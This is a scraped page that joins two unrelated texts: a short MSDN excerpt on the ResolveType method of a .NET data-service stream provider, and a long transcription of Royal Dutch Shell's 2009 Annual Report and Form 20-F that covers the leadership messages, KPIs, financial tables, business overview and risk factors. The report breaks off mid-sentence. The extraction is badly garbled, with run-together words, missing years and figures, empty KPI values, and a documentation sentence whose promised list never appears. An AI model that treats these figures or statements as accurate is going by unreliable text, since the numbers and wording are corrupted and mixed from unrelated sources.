The ResolveType method is called by the data service when a new entity that is a media link entry is being created together with its media resource. An implementer of this method must inspect the request headers in operationContext and return the namespace qualified type name that represents the type that the data service runtime must instantiate to create the media link entry that is associated with the new media resource. The string that represents this type name is passed to the CreateResource method to create the media link entry.
When you implement the GetWriteStream method, you should raise the following exceptions as indicated:
Available since 3.5 | https://msdn.microsoft.com/en-us/library/system.data.services.providers.idataservicestreamprovider.resolvetype.aspx?cs-save-lang=1&cs-lang=cpp | CC-MAIN-2018-22 | en | refinedweb |
ANNUAL REPORT ROYAL DUTCH SHELL PLC ANNUAL REPORT AND FORM 20-F FOR THE YEAR ENDED DECEMBER 31, 2009
- Brian Hunter
- 2 years ago
- Views:
Transcription
1 ANNUAL REPORT ROYAL DUTCH SHELL PLC ANNUAL REPORT AND FORM 20-F FOR THE YEAR ENDED DECEMBER 31, 2009
2 OUR BUSINESSES a c d E b M J K F M H l G I N CHEMICAL PRODUCTS USED FOR Plastics Coatings Detergents REFINED OIL GAS AND ELECTRICITY Industrial use Domestic use PRODUCTS (Bio) Fuels Lubricants Bitumen Liquefied petroleum gas UPSTREAM Exploring for oil and gas a Developing fields b Producing oil and gas c Mining oil sands d Extracting bitumen E Liquefying gas by cooling (LNG) F Regasifying LNG G Converting gas to liquid products (GTL) H Generating wind energy I DOWNSTREAM Refining oil into fuels and lubricants J Producing petrochemicals K Developing biofuels l Trading M Retail sales N Managing CO 2 emissions Supply and distribution Business-to-business sales
3 UNITED STATES SECURITIES AND EXCHANGE COMMISSION Washington, D.C Form 20-F ANNUAL REPORT PURSUANT TO SECTION 13 OR 15(d) OF THE SECURITIES EXCHANGE ACT OF 1934 For the fiscal year ended December 31, 2009 Commission file number Royal Dutch Shell plc (Exact name of registrant as specified in its charter) England and Wales (Jurisdiction of incorporation or organisation) Carel van Bylandtlaan 30, 2596 HR, The Hague, The Netherlands Tel. no: (Address of principal executive offices) Securities registered pursuant to Section 12(b) of the Act Title of Each Class Name of Each Exchange on Which Registered American Depositary Receipts representing Class A ordinary shares New York Stock Exchange of the issuer of an aggregate nominal value e0.07 each American Depositary Receipts representing Class B ordinary shares of New York Stock Exchange the issuer of an aggregate nominal value of e0.07 each 1.30% Guaranteed Notes due 2011 New York Stock Exchange 5.625% Guaranteed Notes due 2011 New York Stock Exchange Floating Guaranteed Notes due 2011 New York Stock Exchange 4.95% Guaranteed Notes due 2012 New York Stock Exchange 4.0% Guaranteed Notes due 2014 New York Stock Exchange 3.25% Guaranteed Notes due 2015 New York Stock Exchange 5.2% Guaranteed Notes due 2017 New York Stock Exchange 4.3% Guaranteed Notes due 2019 New York Stock Exchange 6.375% Guaranteed Notes due 2038 New York Stock Exchange Securities. Outstanding as of December 31, 2009: 3,454,731,900 Class A ordinary shares of the nominal value of e0.07 each. 2,667,562,105 Class B ordinary shares of the nominal value of e0.07 each. Indicate by check mark if the registrant is a well-known seasoned issuer, as defined in Rule 405 of the Securities Act. Yes n No If this report is an annual or transition report, indicate by check mark if the registrant is not required to file reports pursuant to Section 13 or 15(d) of the Securities Exchange Act of n Yes n No Indicate by check mark whether the registrant is a large accelerated filer, an accelerated filer, or a non-accelerated filer. See definition of accelerated filer and large accelerated filer in Rule 12b-2 of the Exchange Act. (Check one): Large acceleratedfiler Accelerated filer n Non-acceleratedfiler n Indicate by check mark which basis of accounting the registrant has used to prepare the financial statements included in this filing: U.S. GAAP n International Financial Reporting Standards as issued by the International Accounting Standards Board Other n If Other has been checked in response to the previous question, indicate by check mark which financial statement item the registrant has elected to follow. Item 17 n Item 18 n If this is an annual report, indicate by check mark whether the registrant is a shell company (as defined in Rule 12b-2 of the Exchange Act). n Yes No Copies of notices and communications from the Securities and Exchange Commission should be sent to: Royal Dutch Shell plc Carel van Bylandtlaan HR, The Hague, The Netherlands Attn: Mr. M. Brandjes
4 2 Shell Annual Report and Form 20-F 2009 About this Report ABOUT THIS REPORT This Report serves as the Annual Report and Accounts in accordance with UK requirements and as the Annual Report on Form 20-F as filed with the US Securities and Exchange Commission (SEC) for the year ended December 31, 2009, for Royal Dutch Shell plc (the Company) and its subsidiaries (collectively known as Shell). It presents the Consolidated Financial Statements of Shell (pages ) and the Parent Company Financial Statements of Shell (pages ). Cross references to Form 20-F are set out on pages of this Report. In this Report Shell is sometimes used for convenience where references are made to the Company Parent Company and all subsidiaries. The companies in which Shell has significant influence but not control are referred to as associated companies or associates and companies in which Shell has joint control are referred to as jointly controlled entities. Joint ventures are comprised of jointly controlled entities and jointly controlled assets. In this Report, associates and jointly controlled entities are also referred to as equityaccounted investments. The term Shell interest is used for convenience to indicate the direct and/or indirect (for example, through our 34% shareholding in Woodside Petroleum Ltd.) ownership interest held by Shell in a venture, partnership or company, after exclusion of all third-party interests. Except as otherwise specified, the figures shown in the tables in this Report represent those in respect of subsidiaries only, without deduction of minority interest. However, the term Shell share is used for convenience to refer to the volumes of hydrocarbons that are produced, processed or sold through both subsidiaries and equity-accounted investments. All of a subsidiary. Except as otherwise noted, the figures shown in this Report are stated in US dollars. As used herein all references to dollars or $ are to the US currency. The Business Review (BR) and other sections of this Report contain forward-looking statements (within the meaning of the United Stateslooking statements are identified by their use of terms and phrases such as anticipate, believe, could, estimate, expect, goals, intend, may, objectives, outlook, plan, probably, project, risks, scheduled,looking. These references are for the readers convenience only. Shell is not incorporating by reference any information posted on, D.C For further information on the operation of the public reference room and the copy charges, please call the SEC at (800) SEC All of the SEC filings made electronically by Shell are available to the public at the SEC website at (commission file number ). This Report, as well as the Annual Review, is also available, free of charge, at or at the offices of Shell in The Hague, the Netherlands and London, UK. You may also obtain copies of this Report, free of charge, by mail.
5 Shell Annual Report and Form 20-F About this Report ABBREVIATIONS CURRENCIES $ US dollar sterling euro CHF Swiss franc C$ Canadian dollar UNITS OF MEASUREMENT acre approximately 0.4 hectares or 4 square kilometres b(/d) barrels (per day) bcf/d billion cubic feet per day boe(/d) barrel of oil equivalent (per day); natural gas has been converted to oil equivalent using a factor of 5,800 scf per barrel (k)dwt (thousand) deadweight tonnes MMBtu million British thermal units mtpa million tonnes per annum MW megawatts per day volumes are converted to a daily basis using a calendar year scf standard cubic feet PRODUCTS GTL LNG LPG NGL gas to liquids liquefied natural gas liquefied petroleum gas natural gas liquids MISCELLANEOUS ADR AGM CO 2 DBP EMTN FID GHG HSSE IFRIC IFRS LTIP NGO OML OPEC OPL PSA PSC PSP R&D REMCO RSP SEC TRCF WTI American Depositary Receipt Annual General Meeting carbon dioxide deferred bonus plan euro medium-term note final investment decision greenhouse gas health, safety, security and environment International Financial Reporting Interpretations Committee International Financial Reporting Standards long-term incentive plan non-governmental organisation onshore oil mining lease Organization of the Petroleum Exporting Countries oil prospecting licence production-sharing agreement production-sharing contract performance share plan research and development Remuneration Committee restricted share plan United States Securities and Exchange Commission total recordable case frequency West Texas Intermediate
6 4 Shell Annual Report and Form 20-F 2009 About this Report TABLE OF CONTENTS 5 Our locations 6 Chairman s message 7 Chief Executive Officer s review 8 Business Review 8 Key performance indicators 10 Selected financial data 11 Business overview 13 Risk factors 16 Summary of results and strategy 19 Upstream 38 Downstream 44 Corporate 45 Liquidity and capital resources 49 Our people 50 Environment and society 53 The Board of Royal Dutch Shell plc 56 Senior Management 57 Report of the Directors 60 Directors Remuneration Report 76 Corporate governance 87 Additional shareholder information 96 Consolidated Financial Statements 140 Supplementary information oil and gas 158 Parent Company Financial Statements 170 Royal Dutch Shell Dividend Access Trust Financial Statements 177 Exhibits
7 Shell Annual Report and Form 20-F Our locations OUR LOCATIONS Upstream Downstream Europe Austria m m Belgium m Bulgaria m Czech Republic m Denmark m m Finland m France m Germany m m Gibraltar m Greece m m Hungary m m Ireland m m Italy m m Luxembourg m The Netherlands m m Norway m m Poland m Portugal m Slovakia m m Slovenia m Spain m m Sweden m m Switzerland m UK m m Ukraine m m Asia Brunei m m China m m Guam m India m m Indonesia m Iran m m Iraq m Japan m m Jordan m Kazakhstan m Laos m Malaysia m m Oman m m Pakistan m m Papua New Guinea m Philippines m m Qatar m Russia m m Saudi Arabia m m Singapore m m South Korea m m Sri Lanka m Syria m Taiwan m Thailand m Turkey m m United Arab Emirates m m Vietnam m Australia/Oceania Australia m m New Zealand m m Africa Upstream Downstream Algeria m m Benin m Botswana m Burkina Faso m Cameroon m Cape Verde Islands m Côte d Ivoire m Egypt m m Gabon m Ghana m m Guinea m Kenya m Libya m Madagascar m Mali m Mauritius m Morocco m m Namibia m Nigeria m La Réunion m Senegal m South Africa m m Tanzania m Togo m Tunisia m m Uganda m North America Barbados m Canada m m Costa Rica m Dominican Republic m El Salvador m Mexico m m Panama m Puerto Rico m Trinidad & Tobago m USA m m South America Argentina m m Brazil m m Chile m Colombia m m French Guiana m Guyana m Peru m Venezuela m m
8 6 Shell Annual Report and Form 20-F 2009 Chairman s message CHAIRMAN S MESSAGE In 2009 the world felt the acute effects of the global recession. Oil demand experienced its steepest drop since Consumption of natural gas in the European Union fell more than it ever has before. Refining margins were put under great pressure, as were the margins in the petrochemicals business. Financing of projects tightened as banks rebuilt their balance sheets. And the treasuries of many countries came under severe strain. By the end of 2009, unprecedented economic-stimulus packages and the irrepressible growth of key Asian nations appeared to turn around the global economy. But weak consumer demand and lingering unemployment in the USA and Europe are likely to weigh down the recovery for some time. We responded swiftly to the downturn, restructuring Shell to make it more competitive. And we did so without diluting the talents that make our company strong. At the same time, we retained our long-term view. We stuck to our capital-spending plans throughout 2009 and continued working on the energy projects that form the foundations of our future. With economic recovery, global demand for energy will resume its growth, in step with increasing population and rising wealth in developing countries. Supplies of all kinds of energy not just oil and gas but also renewables will struggle to keep pace. And even while energy use grows, carbon dioxide (CO 2 )emissionsmustbekeptin check. As the world evolves toward a low-carbon energy system in the years and decades ahead, our unrivalled tradition of technical innovation positions us well. Our technology enables us to find and produce crude oil and natural gas in hard-to-reach places, from the deep ocean to the frozen Arctic. It will one day enable us to produce transport fuels from unusual sources, such as agricultural waste. We are already applying our technology to capitalise on our supplies of natural gas, the cleanest-burning fossil fuel. When used to generate electricity, it emits half the CO 2 of coal. New production techniques help us coax it out of impermeable rock. We aim to maintain our leading position in liquefied natural gas, allowing us to extract gas in far-flung locations and transport it to markets in sea-going tankers. We are also turning natural gas into high-performance lubricants and liquid transport fuels. All of this means that by 2012 more than half of our production will be natural gas. Shell excels at applying technology to complex projects on a massive scale. The offshore fields that we recently brought on-stream in Brazil and Russia attest to that. We are following a similar project-engineering approach in several demonstration projects to capture CO 2 and store it safely underground. We are also working to squeeze more value out of every unit of energy we use in our operations. And we are introducing new products and services that help our customers become more efficient energy-users themselves. Making the world s energy supply secure, affordable and sustainable is notjustaworthygoal;itisaglobalimperative.itwilltaketime,andit will take a lot of effort. But with our far-sightedness and technical prowess, we can contribute to the endeavour even as we deliver the results that our shareholders expect in the long term. Jorma Ollila Chairman
9 Shell Annual Report and Form 20-F Chief Executive Officer s review CHIEF EXECUTIVE OFFICER S REVIEW It is a privilege for me to give my first review of Shell s performance as its Chief Executive Officer. I am proud to report how these trying times have brought out some of our best qualities. Our new field developments and ramp-ups produced enough oil and gasin2009tooffsetthenaturaldeclineofourolderfields.the reliability of our refineries also improved. We reduced underlying operating costs by more than $2 billion. And our cash inflows and outflows were broadly balanced in both Upstream and Downstream. But despite our best efforts, 2009 earnings amounted to $12.7 billion, down from $26.5 billion the year before. The reasons for the drop span all our businesses. Our production decreased because of lower demand for natural gas, although divestments and OPEC quotas were partly responsible as well. Lower oil and gas prices also contributed to lower Upstream revenues. Global demand for oil products weakened and refining margins declined to historical lows, reducing our Downstream earnings. Lower sales volumes and margins affected our chemicals performance. Those tough economic realities highlight the need for us to do better in containing our costs and improving our competitiveness. Our performance improved in 2009 in many of the areas we monitor related to sustainable development. Our occupational injury rate was the lowest we have ever recorded. However, tragically we did incur 20 work related fatalities during To help bring down such fatalities ideally to zero we launched a set of safety rules to address specifically the work-time practices with the greatest risk to life. We had a good year in 2009 in exploration. We discovered gas in shale formations of North America and off shore western Australia. There were 11 notable discoveries. Additions to our proved reserves were more than double our production volumes for the year. We will continue to apply our exploration capabilities wherever they are appropriate, including our new leases in Egypt, South Africa and French Guiana. Resources found will be matured into the project funnel that drives our growth. Several major projects already matured in our Upstream portfolio in 2009 with several more set to reach first production within a few years. Together with our partners, we completed Russia s first liquefied natural gas (LNG) plant, Sakhalin II, one of the world s largest integrated projects. In 2009, the Parque das Conchas project offshore Brazil began delivering heavy oil from fields in waters two kilometres deep. In 2010 our Perdido platform in the Gulf of Mexico will tap fields lying under more than three kilometres of water a world record. At such depths sophisticated sub-sea equipment is needed, and it has to be built on site by remote-controlled machines in near-freezing darkness. Our Pearl gas to liquids project in Qatar will apply Shell technology to convert some 1.6 billion cubic feet of gas per day into liquid transport fuel and other high-quality oil products and petrochemical feedstocks. The Qatargas 4 project will take about the same amount of gas and turn it into LNG. Both projects are progressing well; construction is expected to be completed by the end of 2010 with production ramp-up in We have agreed with our partners to begin construction on one of the world s largest natural gas developments: the Gorgon offshore gas field of Australia. The project will nearly double Australia s LNG output. It is also expected to pioneer the large scale capture and storage of carbon dioxide. In late 2009, we secured an important position in Iraq with the government contract for developing the Majnoon field a huge field in a country with great potential. Our Downstream portfolio will need to be carefully reassessed in view of the overcapacity in the refining industry and the growth potential for petrochemicals in Asia. But some new business opportunities were already opened up by 2009 developments. Our new lubricants complex in Zhuhai our sixth such facility in China will help us to supply the world s fastest-growing lubricants market. With the potential for expansion, the complex could become one of Shell s top three lubricants blending plants. We also started up the first of several new advanced processing units at the Shell Eastern Petrochemicals Complex in Singapore. All the new units are expected to be up and running in 2010, reinforcing our ambition to maintain a leading position in the regional market. We have expanded our association with Iogen and Codexis to develop better enzymes and processes for the production of biofuels from straw. In early 2010 we announced our intention to form a $12 billion joint venture with Cosan in Brazil for the production, supply, distribution and retailing of ethanol-based transport fuels. Our successful projects, our new business opportunities and our continued financial flexibility give me confidence to face the economic uncertainties of Thereafter, a period of production and cash-flow growth awaits us. To reach it, we will have to rely even more on technical ingenuity, project management and operational excellence the very things that distinguish us from our competitors. To channel our skills more quickly, more effectively and more economically, last year I reorganised our business units. One of the main aims was to concentrate in one unit the accountabilities for delivering major new projects and developing new technologies. That will better position us to execute Upstream operations and secure access to resources. It will also help us better manage the many environmental and societal issues associated with developing oil and gas fields. These changes, which were implemented shortly after I took on the position of CEO, were not a reaction to transient tough times. In the short term they did accelerate our plans to reduce complexity, overheads and ultimately costs. But in the long term they will improve our performance by sharpening our external focus and giving added impetus to our technology and innovation. I look forward to seeing our revitalised organisation succeed in 2010 and beyond. Peter Voser Chief Executive Officer
10 8 Shell Annual Report and Form 20-F 2009 Business Review fl Key performance indicators BUSINESS REVIEW KEY PERFORMANCE INDICATORS Shell scorecard Total shareholder return % 2008 (33.5)% Total shareholder return (TSR) is the difference between the share price atthestartoftheyearandthesharepriceattheendoftheyear,plus gross dividends paid during the calendar year (reinvested quarterly), expressed as a percentage of the year-start share price. The TSRs of major publicly-traded oil and gas companies can be directly compared, providing a way to determine how Shell is performing against its industry peers. Refinery and chemical plant availability % % Refinery and chemical plant availability is the weighted average of the actual uptime of plants as a percentage of their maximum possible uptime. The weighting is based on the capital employed. It excludes downtime due to uncontrollable factors, such as hurricanes. This indicator is a measure of operational excellence of Shell s Downstream manufacturing facilities. Total reportable case frequency (injuries per million working hours) Totalreportablecasefrequency(TRCF)isthenumberofstaffor contractor injuries requiring medical treatment or time off for every million hours worked. It is a standard measure of occupational safety. Net cash from operating activities ($ billion) Net cash from operating activities is the total of all cash receipts and payments associated with our sales of oil, gas, chemicals and other products. The components that provide a reconciliation from income for the period are listed in the Consolidated Statement of Cash Flows on page 100. This indicator reflects Shell s ability to generate cash for investment and distributions to shareholders. For scorecard purposes only, it is adjusted to exclude taxes paid on divestments. Production available for sale (thousands boe/d) , ,248 Production is the sum of all average daily volumes of unrefined oil and natural gas produced for sale. The unrefined oil comprises crude oil, natural gas liquids and synthetic crude oil. The gas volume is converted into energy-equivalent barrels of oil to make the summation possible. Changes in production have a significant impact on Shell s cash flow. Sales of liquefied natural gas (million tonnes) Salesofliquefiednaturalgas(LNG)isameasureoftheoperational excellence of Shell s Upstream business and the LNG market demand.
11 Shell Annual Report and Form 20-F Business Review fl Key performance indicators Additional performance indicators Reserves Operational spills over 100 kilograms Operational spills are the total number of spills of oil and oil products over 100 kilograms per spill that resulted from our operations. Employees (thousands) Employees is the number of notional full-time employees whose work hours would be equivalent to those of all staff actually holding full-time and part-time employment contracts with Shell subsidiaries, averaged throughout the year. Proved oil and gas reserves (million boe) , ,903 Proved oil and gas reserves (excluding minority interest) are the total estimated quantities of oil and gas that geoscience and engineering data demonstrate with reasonable certainty to be recoverable in future years from known reservoirs, as at December 31, under existing economic and operating conditions. Gas volumes are converted into barrels of oil equivalent (boe). Reserves are crucial to an oil and gas company, since they constitute the source of future production. Reserves estimates are subject to change based on a wide variety of factors, someofwhichareunpredictable;seepages13to15.theproved reserves volumes reported for 2009 have been established using the new SEC rules on oil and gas reporting. Income for the period ($ million) , ,476 Income for the period is the total of all the earnings from every business segment. It is of fundamental importance for a sustainable commercial enterprise. Return on average capital employed % % Return on average capital employed (ROACE) is defined as annual income, adjusted for after-tax interest expense, as a percentage of average capital employed during the year. Capital employed is the sum of total equity and total debt. ROACE measures the efficiency of Shell s utilisation of the capital that it employs and is a common measure of business performance; see page 48. Gearing % % Gearingisdefinedasnetdebt(totaldebtminuscashandcash equivalents) as a percentage of total capital (net debt plus total equity), at December 31. It is a measure of the degree to which Shell s operations are financed by debt. (For further information see Note 16 to the Consolidated Financial Statements.)
12 10 Shell Annual Report and Form 20-F 2009 Business Review fl Selected financial data SELECTED FINANCIAL DATA The selected financial data set out below is derived, in part, from the Consolidated Financial Statements. This data should be read in conjunction with the Consolidated Financial Statements and related Notes, as well as the Business Review in this Report. CONSOLIDATED STATEMENT OF INCOME AND OF COMPREHENSIVE INCOME DATA $ MILLION Revenue 278, , , , ,731 Income from continuing operations 12,718 26,476 31,926 26,311 26,568 Income/(loss) from discontinued operations (307) Income for the period 12,718 26,476 31,926 26,311 26,261 Income attributable to minority interest Income attributable to Royal Dutch Shell plc shareholders 12,518 26,277 31,331 25,442 25,311 Comprehensive income attributable to Royal Dutch Shell plc shareholders 19,141 15,228 36,264 30,113 20,945 CONSOLIDATED BALANCE SHEET DATA $ MILLION Total assets 292, , , , ,516 Total debt 35,033 23,269 18,099 15,773 12,916 Share capital Equity attributable to Royal Dutch Shell plc shareholders 136, , , ,726 90,924 Minority interest 1,704 1,581 2,008 9,219 7,000 EARNINGS PER SHARE $ Basic earnings per 0.07 ordinary share from continuing operations from discontinued operations (0.05) Diluted earnings per 0.07 ordinary share from continuing operations from discontinued operations (0.05) SHARES NUMBER Basic weighted average number of Class A and B shares 6,124,906,119 6,159,102,114 6,263,762,972 6,413,384,207 6,674,179,767 Diluted weighted average number of Class A and B shares 6,128,921,813 6,171,489,652 6,283,759,171 6,439,977,316 6,694,427,705 OTHER FINANCIAL DATA $ MILLION Net cash from operating activities 21,488 43,918 34,461 31,696 30,113 Net cash used in investing activities 26,234 28,915 14,570 20,861 8,761 Dividends paid 10,717 9,841 9,204 8,431 10,849 Net cash used in financing activities 829 9,394 19,393 13,741 18,573 (Decrease)/increase in cash and cash equivalents (5,469) 5, (2,728) 2,529 Earnings by segment Upstream 8,354 26,506 18,094 17,852 15,827 Downstream 3, ,445 8,165 10,106 Corporate 1,310 (69) 1, Total 12,718 26,476 31,926 26,311 26,261 Capital investment [A] Upstream 23,951 32,166 21,362 20,281 13,698 Downstream 7,510 6,036 5,295 4,346 3,450 Corporate Total 31,735 38,444 27,072 24,896 17,436 [A] Capital expenditure, exploration expense and new equity and loans in equity-accounted investments.
13 Shell Annual Report and Form 20-F Business Review fl Business overview BUSINESS OVERVIEW History From 1907 until 2005, Royal Dutch Petroleum Company (Royal Dutch) and The Shell Transport and Trading Company, p.l.c. (Shell Transport) were the two public parent companies of a group of companies known collectively as the Royal Dutch/Shell Group (Group). Operating activities were conducted through the subsidiaries of Royal Dutch and Shell Transport. In 2005, Royal Dutch Shell plc (Royal Dutch Shell) became the single parent company of Royal Dutch and Shell Transport, the two former public parent companies of the Group (the Unification). oil and gas production. Our oil and gas producing heartlands are the core countries that have the available infrastructure, expertise and remaining growth potential for Shell to sustain strong operational performance and support continued investment. They are Australia, Brunei, Canada, Denmark, Malaysia, the Netherlands, Nigeria, Norway, Oman, the UK and the USA. Russia represents a new heartland with Sakhalin II on-stream in 2009, and we expect Qatar to become a heartland in the coming years. We are bringing new oil and gas supplies on stream from major field developments. We are also investing in growing our gas-based business through liquefied natural gas (LNG) and gas to liquids (GTL) projects. For example, we are building one of the world s largest GTL projects in Qatar, and we are participating in the Gorgon LNG project in Australia. At the same time, we are exploring for oil and gas in prolific geological formations that can be conventionally developed, such as those found in the Gulf of Mexico, Brazil and Australia. But we also are exploring for hydrocarbons in formations, such as low-permeability gas reservoirs in the USA, Canada and China, which can be economically developed only by unconventional means. We also have a diversified and balanced portfolio of refineries and chemicals plants and are a major distributor of biofuels. We have the largest retail portfolio of our peers, and delivered strong growth in differentiated fuels. We have a strong position not only in the major industrialised countries but also in the developing ones. The distinctive Shell pecten (a trademark in use since the early part of the twentieth century) and trademarks in which the word Shell appears support this marketing effort throughout the world. Organisation On July 1, 2009, Peter Voser succeeded Jeroen van der Veer as Chief Executive Officer (CEO). On the same date, a series of changes in the organisation and responsibilities of senior management became effective. BUSINESSES Upstream International manages the upstream business outside the Americas. It searches for and recovers crude oil and natural gas, liquefies and transports gas and operates the upstream and midstream infrastructure necessary to deliver oil and gas to market. Upstream International also manages the global LNG business and the wind business in Europe. The activities are organised within geographical units, some business-wide managed activities and supporting activities. Upstream Americas manages the upstream business in North and South America. It searches for and recovers crude oil and natural gas, liquefies and transports gas and operates the upstream and midstream infrastructure necessary to deliver oil and gas to market. Upstream Americas also extracts bitumen from oil sands that is converted into synthetic crude oil. Additionally, it manages the US based wind business. It comprises operations organised into business-wide managed activities and supporting activities. Downstream manages Shell s manufacturing, distribution and marketing activities for oil products and chemicals. These activities are organised into globally managed classes of business, including chemicals, some regionally and globally managed activities and supporting activities. Manufacturing and supply includes refining, used in the manufacture of textiles, medical supplies and computers. Downstream also trades Shell s flow of hydrocarbons and other energy related products, supplies the Downstream businesses, markets gas and power and provides shipping services. Downstream also oversees Shell s interests in alternative energy (excluding wind) and CO 2 management. Projects & Technology manages the delivery of Shell s major projects and drives the research and innovation to create technology solutions. It provides technical services and technology capability covering both Upstream and Downstream activities. It is also responsible for providing functional leadership across Shell in the areas of safety and environment and contracting and procurement. SEGMENTAL REPORTING With effect from July 1, 2009, Upstream consists of the activities previously reported in the Exploration & Production, Gas & Power (excluding solar) and Oil Sands segments. It combines the operating segments Upstream International and Upstream Americas, which have similar economic characteristics and these operating segments are similar in respect of the nature of products and services, the nature of production processes, type and class of customers and the methods of distribution. Downstream consists of the activities previously reported in the Oil Products and Chemicals segments and solar. Upstream and Downstream earnings include their respective elements of Projects & Technology and of trading activities. Corporate represents the key support functions comprising holdings and treasury, headquarters, central functions and Shell s insurance activities. Comparative information in this Report has been reclassified. The changes were part of the reorganisation programme, called Transition The aim of the programme was to enhance accountability for operating performance and technology development within Shell s organisation, thereby quickening decision-making and execution as well as reducing costs.
14 12 Shell Annual Report and Form 20-F 2009 Business Review fl Business overview REVENUE BY BUSINESS SEGMENT (INCLUDING INTER-SEGMENT SALES) $ MILLION Upstream Third parties 27,996 45,975 32,014 Inter-segment 27,144 42,333 35,264 55,140 88,308 67,278 Downstream Third parties 250, , ,711 Inter-segment , , ,280 Corporate Third parties Inter-segment REVENUE BY GEOGRAPHICAL AREA [A] (EXCLUDING INTER-SEGMENT SALES) $ MILLION 2009 % 2008 % 2007 % Europe 103, , , Africa, Asia, Australia/Oceania 80, , , USA 60, , , Other Americas 33, , , Total 278, , , [A] With effect from 2009, the reporting of third-party revenue by geographical area has been changed to reflect better the location of certain business activities. Comparative information is reclassified.
15 Shell Annual Report and Form 20-F Business Review fl Risk factors RISK FACTORS Shell soperationsandearningsaresubjecttorisksfromchanging conditions in competitive, economic, political, legal, regulatory, social, industry, business and financial fields. These risks could have a material adverse effect separately or in combination on Shell s operational performance, earnings or financial condition. Investors should carefully consider the risks below and the limitation of shareholder remedies associated with our Articles of Association as discussed below. Shell s operating results and financial condition are exposed to fluctuating prices of crude oil, natural gas, oil products and chemicals. Prices of oil, natural gas, oil products and chemicals are affected by supply and demand. Factors that influence supply and demand include operational issues, natural disasters, weather, political instability, conflicts, economic conditions and actions by major oil-exporting countries. Price fluctuations have a material effect on our earnings and our financial condition. For example, in a low oil and gas price environment Shell would generate less revenue from its Upstream production, and as a result certain long-term projects might become less profitable or even incur losses. Additionally, low oil and gas prices could result in the debooking of oil or natural gas reserves, if they become uneconomic in this type of environment. Prolonged periods of low oil and gas prices, or rising costs, could also result in projects being delayed or cancelled, as well as in the impairment of certain assets. In a high oil and gas price environment, we can experience sharp increases in cost and under some production-sharing contracts our entitlement to reserves would be reduced. Higher prices can also reduce demand for our products. Lower demand for our products might result in lower profitability, particularly in our Downstream business. Oilandgaspricescanmoveindependentlyfromeachother. Shell s future hydrocarbon production depends on the delivery of large and complex projects, as well as the ability to replace oil and gas reserves. We face numerous challenges in developing capital projects, especially large ones. Challenges include uncertain geology, frontier conditions, the existence and availability of necessary technology and engineering resources, availability of skilled labour, project delays and potentialcostoverruns,aswellastechnical,fiscal,regulatory,political and other conditions. Such potential obstacles may impair our delivery of these projects, as well as our ability to fulfil related contractual commitments, and, in turn, adversely affect our operational performance and financial position. Future oil and gas production will depend on our access to new proved reserves through exploration, negotiations with governments and other owners of known reserves, and acquisitions. Failure to replace proved reserves could result in lower future production. PROVED DEVELOPED AND UNDEVELOPED RESERVES [A][B] (AT DECEMBER 31) MILLION BOE [C] 2009 [D] 2008 [E] 2007 [E] Shell subsidiaries (less minority interest) 9,846 7,078 6,669 Shell share of equity-accounted investments 4,286 3,825 4,140 Total 14,132 10,903 10,809 [A] We manage our total proved reserves base without distinguishing between proved oil and gas reserves associated with our equity-accounted investments andprovedoilandgasreservesfromsubsidiaries. [B] The SEC and FASB adopted revised standards for oil and gas reserves reporting for Prior years reserves quantities have been determined on the basis of the predecessor rules, accordingly proven minable oil sands reserves of 997 million boe are not included in 2008 (2007: 1,111 million boe). [C] Natural gas has been converted to oil equivalent using a factor of 5,800 scf per barrel. [D] Includes proved reserves associated with future production that will be consumed in operations and synthetic crude oil reserves. [E] Does not include volumes expected to be produced and consumed in our operations and synthetic crude oil reserves. Shell s ability to achieve its strategic objectives depends on our reaction to competitive forces. We face significant competition in each of our businesses. While we try to differentiate our products, many of them are competing in commodity-type markets. If we do not manage our expenses adequately, our cost efficiency might deteriorate and our unit costs might increase. This in turn might erode our competitive position. Increasingly, we compete with state-run oil and gas companies, particularly in seeking access to oil and gas resources. our competitive position or access to desirable projects. An erosion of Shell s business reputation would have a negative impact on our licence to operate, our brand, our ability to secure new resources and our financial performance. Shell is one of the world s leading energy brands, and our brand and reputation are important assets. The Shell General Business Principles and Code of Conduct govern how Shell and our individual companies conduct our affairs. While we seek to ensure compliance with these requirements by all of our 101 thousand employees, it is a significant challenge. Failure real or perceived to follow these principles, or other real or perceived failures of governance or regulatory compliance could harm our reputation. This could impact our licence to operate, damage our brand, harm our ability to secure new resources and affect our operational performance and financial condition. OIL AND GAS PRODUCTION AVAILABLE FOR SALE [A] MILLION BOE 2009 [B] Subsidiaries Equity-accounted investments Total 1,147 1,160 1,181 [A] Natural gas has been converted to oil equivalent using a factor of 5,800 scf per barrel. [B] Includes synthetic crude oil production. Rising climate change concerns could lead to additional regulatory measures that may result in project delays and higher costs. Emissions of greenhouse gases and associated climate change are real risks to Shell. 2 intensity of our production as well as our absolute CO 2 emissions might increase, for example from the expansion of oil sands activities in Canada. Also our Pearl GTL project in Qatar is expected to increase our CO 2 emissions when production begins. Over time, we expect that a growing share of our CO 2
16 14 Shell Annual Report and Form 20-F 2009 Business Review fl Risk factors emissions will be subject to regulation and carry a cost. If we are unable to find economically viable as well as publicly accepted solutions that reduce our CO 2 emissions for new and existing projects or products, regulatory and/or political and societal pressures could lead to project delays, additional costs as well as compliance and operational risks. ThenatureofShell soperationsexposesustoawiderangeof significant health, safety, security and environment (HSSE) risks. The HSSE risks, to which we are potentially exposed, cover a wide spectrum, given the geographic range, operational diversity and technical complexity of Shell s daily operations. Shell has significant operations in difficult geographies or climate zones, as well as environmentally sensitive regions which exposes us to the risk, amongst others, of major process safety incidents, effects of natural disasters, social unrest, personal health and safety and crime. If a major HSSE risk, such as an explosion or hydrocarbon spill due to a process safety incident, materialises, this could result in injuries, loss of life, environmental harm, disruption to business activities and, depending on their cause and severity, material damage to Shell s reputation. Shell operates in over 90 countries, with differing degrees of political, legal and fiscal stability. This exposes us to a wide range of political developments and resulting changes to laws and regulations. Developments in politics, laws and regulations can and do affect our operations and earnings. Potential developments include forced divestment of assets; expropriation of property; cancellation of contract rights; additional windfall taxes and other retroactive tax claims; import and export restrictions; foreign exchange controls; and changing environmental regulations. In our Upstream activities these developments could additionally affect land tenure, re-writing of leases, entitlement to produced hydrocarbons, production rates, royalties and pricing. Parts of our Downstream business are subject to price controls in some countries. When such risks materialise they can affect the employees, reputation, operational performance and financial position of Shell as well as of the Shell companies located in the country concerned. If we do not comply with policies and regulations, it may result in regulatory investigations, lawsuits and ultimately sanctions. Shell s international operations expose us to social instability, terrorism and acts of war or piracy that could significantly impact our business. Social and civil unrest, both within the countries in which we operate and internationally, can and does affect operations and earnings. Potential developments that could impact our business include international conflicts, including war, acts of political or economic terrorism and acts of piracy on the high seas, as well as civil unrest and local security concerns that threaten the safe operation of our facilities and transport of our 